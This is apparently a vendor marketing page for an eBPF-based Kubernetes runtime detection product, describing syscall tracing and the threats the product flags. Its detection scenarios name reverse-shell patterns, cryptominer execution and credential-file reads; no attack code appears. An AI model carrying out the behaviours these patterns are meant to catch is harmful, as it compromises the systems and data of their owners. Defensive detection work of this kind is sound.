Platform Platform Overview Runtime Detection SBOM & SCA Container Scanning Supply Chain Integrations Pricing Docs Blog
Sign in Start Free Trial

Runtime Detection

See every syscall. Stop threats before they spread.

eBPF probes attach to kernel tracepoints at the node level — capturing process ancestry, network connections, and file operations across every container workload with less than 2ms P99 overhead.

Start Free Trial View Quickstart
eBPF runtime detection dashboard showing syscall events, process ancestry tree, and container threat alerts in a dark terminal UI

How eBPF Detection Works

Kernel-level visibility, zero instrumentation

Syscall tracepoint probes

The eBPF program attaches to sys_enter_* and sys_exit_* tracepoints. Every open, connect, execve, and ptrace call generates a structured event in the ringbuffer — processed in userspace with <2ms P99 latency.

Process ancestry tree

Each event carries the full process chain from container entrypoint to child process. Detects classic container escape patterns: shell spawning from a web process, unexpected binary execution, namespace escape via clone flags.

Network connection map

Intercepts connect() and accept() calls to build a live network graph of which pods are talking to which endpoints. Unexpected outbound connections to external IPs trigger configurable alerts.

Configurable detection rules

Comes with a baseline ruleset tuned for Kubernetes workloads. Custom rules use a YAML-based format compatible with Falco rule syntax — reuse your existing rules library.

Detection Scenarios

Threats we catch out of the box

Container escape

Privileged container abuse, host namespace access, and mount namespace escape attempts — detected via syscall pattern matching on unshare, clone, and host path mounts.

Reverse shell detection

Shell process spawned from a non-shell parent (e.g. nginx → bash) combined with an outbound TCP connection — high-confidence reverse shell pattern, firing in under 50ms of event arrival.

Cryptominer execution

Detects XMRig and similar miners via binary name + CPU affinity syscalls + outbound connection to mining pool ports. Includes detection of renamed binaries via hash comparison.

Lateral movement

Internal service-to-service connections outside normal network policy, combined with credential-related file reads — catches the early stages of pod-to-pod lateral movement before exfiltration.

Runtime visibility in your cluster today.

Helm install in 15 minutes. First detection finding in the same sprint.

Start Free Trial View Quickstart Docs